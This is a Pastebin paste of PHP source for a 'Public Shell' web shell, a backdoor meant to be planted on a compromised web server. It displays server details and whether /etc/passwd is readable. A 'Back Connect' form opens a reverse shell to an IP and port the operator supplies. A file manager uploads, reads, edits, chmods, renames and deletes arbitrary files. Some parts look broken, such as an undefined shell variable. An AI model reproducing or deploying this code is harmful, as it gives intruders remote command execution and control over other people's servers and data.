API tools faq
paste
Kyfx

Public Modified Web Shell

Kyfx
Mar 19th, 2015
348
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.75 KB | None | 0 0
raw download clone embed print report
  1. <center>
  2. <H1><center>Public Shell</center></H1>
  3. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  4. <tr><td>
  5. <center>
  6. <?php
  7. $freespace_show = sprintf('%1.2f', $bytes / pow($base, $class)) . ' ' . $si_prefix[$class] . '';
  8. $etc_passwd = @is_readable("/etc/passwd") ? "<b><span style=\"color:#444444\">ON </span></b>" : "<b><span style=\"color:red\"/>Disabled </span></b>";
  9. echo '<b><font color=red>Disable Functions: </b></font>';
  10. if ('' == ($func = @ini_get('disable_functions'))) {
  11. echo "<b><font color=green>NONE</font></b>";
  12. } else {
  13. echo "<b><font color=red>$func</font></b>";
  14. echo '</td></tr>';
  15. }
  16. echo '</br>';
  17. echo '<b><font color=red>Uname : </b></font><b>'.php_uname().'</b>';
  18. echo '</br>';
  19. echo '<b><font color=red>PHP Version : </b></font><b>'. phpversion() .'</b>';
  20. echo '</br>';
  21. echo '<b><font color=red>Server Admin : </b></font><b>'.$_SERVER['SERVER_ADMIN'].'</b>';
  22. echo '</br>';
  23. echo '<b><font color=red>Server IP : </b></font><b>'.$_SERVER['SERVER_ADDR'].' </b>';
  24. echo '<b><font color=red>Your IP : </b></font><b>'.$_SERVER['REMOTE_ADDR'].'</b>';
  25. echo "</br>";
  26. echo "<b><font color=red>Safe Mode : </font></b>";
  27. // Check for safe mode
  28. if( ini_get('safe_mode') ) {
  29. print '<font color=#FF0000><b>Safe Mode is ON</b></font>';
  30. } else {
  31. print '<font color=#008000><b>Safe Mode is OFF</b></font>';
  32. }
  33. echo "</br>";
  34. echo "<b><font color=red>Read etc/passwd : </font></b><b>$etc_passwd</b>";
  35. echo "<b><font color=red>Functions : </font><b>";echo "<a href='$php_self?p=info'>PHP INFO </a>";
  36. if(@$_GET['p']=="info"){@phpinfo();
  37. exit;}
  38. ?>
  39. <br>
  40. </center>
  41. <center>
  42. <b><font color=red>Back Connect </font></b>
  43. <form action="?connect=Pub" method="post">
  44. IP : <input type="text" name="ip" value= "Your IP"/>
  45. PORt :<input type="text" name="port" value= "22"/>
  46. <input alt="Submit" type="image">
  47. </form>
  48. <?php
  49. function printit ($string)
  50. {
  51. if (!$daemon)
  52. {
  53. print "$string\
  54. ";
  55. }
  56. }
  57. $bc = $_GET["connect"];
  58. switch($bc)
  59. {
  60. case "Pub":
  61. set_time_limit (0);
  62. $VERSION = "1.0";
  63. $ip = $_POST["ip"];
  64. $port = $_POST["port"];
  65. $chunk_size = 1400;
  66. $write_a = null;
  67. $error_a = null;
  68. $daemon = 0;
  69. $debug = 0;
  70. if (function_exists('pcntl_fork'))
  71. {
  72.  
  73. $pid = pcntl_fork();
  74.  
  75. if ($pid == -1)
  76. {
  77. printit("ERROR: Can't fork");
  78. exit(1);
  79. }
  80.  
  81. if ($pid) {
  82. exit(0); // Parent exits
  83. }
  84. if (posix_setsid() == -1) {
  85. printit("Error: Can't setsid()");
  86. exit(1);
  87. }
  88.  
  89. $daemon = 1;
  90. }
  91. else {
  92. print("DISCONNECTED");
  93. }
  94.  
  95. // Change to a safe directory
  96. chdir("/tmp/");
  97.  
  98. // Remove any umask we inherited
  99. umask(0);
  100.  
  101. //
  102. // Do the reverse shell...
  103. //
  104.  
  105. // Open reverse connection
  106. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  107. if (!$sock) {
  108. printit("$errstr ($errno)");
  109. exit(1);
  110. }
  111.  
  112. // Spawn shell process
  113. $descriptorspec = array(
  114. 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
  115. 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
  116. 2 => array("pipe", "w") // stderr is a pipe that the child will write to
  117. );
  118.  
  119. $process = proc_open($shell, $descriptorspec, $pipes);
  120.  
  121. if (!is_resource($process)) {
  122. printit("ERROR: Can't spawn shell");
  123. exit(1);
  124. }
  125.  
  126. // Set everything to non-blocking
  127. // Reason: Occsionally reads will block, even though stream_select tells us they won't
  128. stream_set_blocking($pipes[0], 0);
  129. stream_set_blocking($pipes[1], 0);
  130. stream_set_blocking($pipes[2], 0);
  131. stream_set_blocking($sock, 0);
  132.  
  133. printit("");
  134.  
  135. while (1) {
  136. // Check for end of TCP connection
  137. if (feof($sock)) {
  138. printit(" :- TCP connection ended");
  139. break;
  140. }
  141.  
  142. // Check for end of STDOUT
  143. if (feof($pipes[1])) {
  144. printit("END of STDOUT");
  145. break;
  146. }
  147.  
  148. // Wait until a command is end down $sock, or some
  149. // command output is available on STDOUT or STDERR
  150. $read_a = array($sock, $pipes[1], $pipes[2]);
  151. $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  152.  
  153. // If we can read from the TCP socket, send
  154. // data to process's STDIN
  155. if (in_array($sock, $read_a)) {
  156. if ($debug) printit("SOCK READ");
  157. $input = fread($sock, $chunk_size);
  158. if ($debug) printit("SOCK: $input");
  159. fwrite($pipes[0], $input);
  160. }
  161.  
  162. // If we can read from the process's STDOUT
  163. // send data down tcp connection
  164. if (in_array($pipes[1], $read_a)) {
  165. if ($debug) printit("STDOUT READ");
  166. $input = fread($pipes[1], $chunk_size);
  167. if ($debug) printit("STDOUT: $input");
  168. fwrite($sock, $input);
  169. }
  170.  
  171. // If we can read from the process's STDERR
  172. // send data down tcp connection
  173. if (in_array($pipes[2], $read_a)) {
  174. if ($debug) printit("STDERR READ");
  175. $input = fread($pipes[2], $chunk_size);
  176. if ($debug) printit("STDERR: $input");
  177. fwrite($sock, $input);
  178. }
  179. }
  180.  
  181. fclose($sock);
  182. fclose($pipes[0]);
  183. fclose($pipes[1]);
  184. fclose($pipes[2]);
  185. proc_close($process);
  186.  
  187. // Like print, but does nothing if we've daemonised ourself
  188. // (I can't figure out how to redirect STDOUT like a proper daemon)
  189. break;
  190. }
  191.  
  192.  
  193. ?>
  194. </center>
  195. </td></tr>';
  196. <?php
  197.  
  198. set_time_limit(0);
  199. error_reporting(0);
  200.  
  201. if(get_magic_quotes_gpc()){
  202. foreach($_POST as $key=>$value){
  203. $_POST[$key] = stripslashes($value);
  204. }
  205. }
  206. echo '<!DOCTYPE HTML>
  207. <HTML>
  208. <HEAD>
  209. <link href="" rel="stylesheet" type="text/css">
  210. <title>Public Shell Version 2.0</title>
  211. <style>
  212. body{
  213. font-family: "Arial", cursive;
  214. background-color: #e6e6e6;
  215. text-shadow:0px 0px 1px #757575;
  216. }
  217. #content tr:hover{
  218. background-color: #636263;
  219. text-shadow:0px 0px 10px #fff;
  220. }
  221. #content .first{
  222. background-color: silver;
  223. }
  224. #content .first:hover{
  225. background-color: gray;
  226. text-shadow:0px 0px 1px #757575;
  227. }
  228. table{
  229. border: 1px #000000 dotted;
  230. }
  231. H1{
  232. font-family: "Arial", cursive;
  233. }
  234. a{
  235. color: #000;
  236. text-decoration: none;
  237. }
  238. a:hover{
  239. color: #fff;
  240. text-shadow:0px 0px 10px #ffffff;
  241. }
  242. input,select,textarea{
  243. border: 1px #000000 solid;
  244. -moz-border-radius: 5px;
  245. -webkit-border-radius:5px;
  246. border-radius:5px;
  247. }
  248. </style>
  249. </HEAD>
  250. <BODY>
  251.  
  252. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  253. <tr><td>
  254. <center>
  255. <font color=red><b>Current Path : </font></b>';
  256. if(isset($_GET['path'])){
  257. $path = $_GET['path'];
  258. }else{
  259. $path = getcwd();
  260. }
  261. $path = str_replace('\\','/',$path);
  262. $paths = explode('/',$path);
  263.  
  264. foreach($paths as $id=>$pat){
  265. if($pat == '' && $id == 0){
  266. $a = true;
  267. echo '<a href="?path=/">/</a>';
  268. continue;
  269. }
  270. if($pat == '') continue;
  271. echo '<a href="?path=';
  272. for($i=0;$i<=$id;$i++){
  273. echo "$paths[$i]";
  274. if($i != $id) echo "/";
  275. }
  276. echo '">'.$pat.'</a>/';
  277. }
  278. echo '</td></tr><tr><td>';
  279. if(isset($_FILES['file'])){
  280. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  281. echo '<font color="green">File Upload Done.</font><br />';
  282. }else{
  283. echo '<font color="red">File Upload Error.</font><br />';
  284. }
  285. }
  286. echo '<center>';
  287. echo '<form enctype="multipart/form-data" method="POST">
  288. <b><font color=red>File Upload : </b></font><input type="file" name="file" />
  289. <input type="submit" value="upload" />
  290. </form>
  291. </td></tr>';
  292. if(isset($_GET['filesrc'])){
  293. echo "<tr><td>Current File : ";
  294. echo $_GET['filesrc'];
  295. echo '</tr></td></table><br />';
  296. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  297. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  298. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  299. if($_POST['opt'] == 'chmod'){
  300. if(isset($_POST['perm'])){
  301. if(chmod($_POST['path'],$_POST['perm'])){
  302. echo '<font color="green">Change Permission Done.</font><br />';
  303. }else{
  304. echo '<font color="red">Change Permission Error.</font><br />';
  305. }
  306. }
  307. echo '<form method="POST">
  308. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  309. <input type="hidden" name="path" value="'.$_POST['path'].'">
  310. <input type="hidden" name="opt" value="chmod">
  311. <input type="submit" value="Go" />
  312. </form>';
  313. }elseif($_POST['opt'] == 'rename'){
  314. if(isset($_POST['newname'])){
  315. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  316. echo '<font color="green">Change Name Done.</font><br />';
  317. }else{
  318. echo '<font color="red">Change Name Error.</font><br />';
  319. }
  320. $_POST['name'] = $_POST['newname'];
  321. }
  322. echo '<form method="POST">
  323. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  324. <input type="hidden" name="path" value="'.$_POST['path'].'">
  325. <input type="hidden" name="opt" value="rename">
  326. <input type="submit" value="Go" />
  327. </form>';
  328. }elseif($_POST['opt'] == 'edit'){
  329. if(isset($_POST['src'])){
  330. $fp = fopen($_POST['path'],'w');
  331. if(fwrite($fp,$_POST['src'])){
  332. echo '<font color="green">Edit File Done.</font><br />';
  333. }else{
  334. echo '<font color="red">Edit File Error.</font><br />';
  335. }
  336. fclose($fp);
  337. }
  338. echo '<form method="POST">
  339. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  340. <input type="hidden" name="path" value="'.$_POST['path'].'">
  341. <input type="hidden" name="opt" value="edit">
  342. <input type="submit" value="Go" />
  343. </form>';
  344. }
  345. echo '</center>';
  346. }else{
  347. echo '</table><br /><center>';
  348. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  349. if($_POST['type'] == 'dir'){
  350. if(rmdir($_POST['path'])){
  351. echo '<font color="green">Delete Dir Done.</font><br />';
  352. }else{
  353. echo '<font color="red">Delete Dir Error.</font><br />';
  354. }
  355. }elseif($_POST['type'] == 'file'){
  356. if(unlink($_POST['path'])){
  357. echo '<font color="green">Delete File Done.</font><br />';
  358. }else{
  359. echo '<font color="red">Delete File Error.</font><br />';
  360. }
  361. }
  362. }
  363. echo '</center>';
  364. $scandir = scandir($path);
  365. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  366. <tr class="first">
  367. <td><center>Name</center></td>
  368. <td><center>Size</center></td>
  369. <td><center>Permissions</center></td>
  370. <td><center>Options</center></td>
  371. </tr>';
  372.  
  373. foreach($scandir as $dir){
  374. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  375. echo "<tr>
  376. <td><a href=\"?path=$path/$dir\">$dir</a></td>
  377. <td><center>--</center></td>
  378. <td><center>";
  379. if(is_writable("$path/$dir")) echo '<font color="green">';
  380. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  381. echo perms("$path/$dir");
  382. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  383.  
  384. echo "</center></td>
  385. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  386. <select name=\"opt\">
  387. <option value=\"\"></option>
  388. <option value=\"delete\">Delete</option>
  389. <option value=\"chmod\">Chmod</option>
  390. <option value=\"rename\">Rename</option>
  391. </select>
  392. <input type=\"hidden\" name=\"type\" value=\"dir\">
  393. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  394. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  395. <input type=\"submit\" value=\">\" />
  396. </form></center></td>
  397. </tr>";
  398. }
  399. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  400. foreach($scandir as $file){
  401. if(!is_file("$path/$file")) continue;
  402. $size = filesize("$path/$file")/1024;
  403. $size = round($size,3);
  404. if($size >= 1024){
  405. $size = round($size/1024,2).' MB';
  406. }else{
  407. $size = $size.' KB';
  408. }
  409.  
  410. echo "<tr>
  411. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  412. <td><center>".$size."</center></td>
  413. <td><center>";
  414. if(is_writable("$path/$file")) echo '<font color="green">';
  415. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  416. echo perms("$path/$file");
  417. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  418. echo "</center></td>
  419. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  420. <select name=\"opt\">
  421. <option value=\"\"></option>
  422. <option value=\"delete\">Delete</option>
  423. <option value=\"chmod\">Chmod</option>
  424. <option value=\"rename\">Rename</option>
  425. <option value=\"edit\">Edit</option>
  426. </select>
  427. <input type=\"hidden\" name=\"type\" value=\"file\">
  428. <input type=\"hidden\" name=\"name\" value=\"$file\">
  429. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  430. <input type=\"submit\" value=\">\" />
  431. </form></center></td>
  432. </tr>";
  433. }
  434. echo '</table>
  435. </div>';
  436. }
  437. echo '<br />Public Shell Version <font color="red">2.0</font>
  438. </BODY>
  439. </HTML>';
  440. function perms($file){
  441. $perms = fileperms($file);
  442.  
  443. if (($perms & 0xC000) == 0xC000) {
  444. // Socket
  445. $info = 's';
  446. } elseif (($perms & 0xA000) == 0xA000) {
  447. // Symbolic Link
  448. $info = 'l';
  449. } elseif (($perms & 0x8000) == 0x8000) {
  450. // Regular
  451. $info = '-';
  452. } elseif (($perms & 0x6000) == 0x6000) {
  453. // Block special
  454. $info = 'b';
  455. } elseif (($perms & 0x4000) == 0x4000) {
  456. // Directory
  457. $info = 'd';
  458. } elseif (($perms & 0x2000) == 0x2000) {
  459. // Character special
  460. $info = 'c';
  461. } elseif (($perms & 0x1000) == 0x1000) {
  462. // FIFO pipe
  463. $info = 'p';
  464. } else {
  465. // Unknown
  466. $info = 'u';
  467. }
  468.  
  469. // Owner
  470. $info .= (($perms & 0x0100) ? 'r' : '-');
  471. $info .= (($perms & 0x0080) ? 'w' : '-');
  472. $info .= (($perms & 0x0040) ?
  473. (($perms & 0x0800) ? 's' : 'x' ) :
  474. (($perms & 0x0800) ? 'S' : '-'));
  475.  
  476. // Group
  477. $info .= (($perms & 0x0020) ? 'r' : '-');
  478. $info .= (($perms & 0x0010) ? 'w' : '-');
  479. $info .= (($perms & 0x0008) ?
  480. (($perms & 0x0400) ? 's' : 'x' ) :
  481. (($perms & 0x0400) ? 'S' : '-'));
  482.  
  483. // World
  484. $info .= (($perms & 0x0004) ? 'r' : '-');
  485. $info .= (($perms & 0x0002) ? 'w' : '-');
  486. $info .= (($perms & 0x0001) ?
  487. (($perms & 0x0200) ? 't' : 'x' ) :
  488. (($perms & 0x0200) ? 'T' : '-'));
  489.  
  490. return $info;
  491. }
  492. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!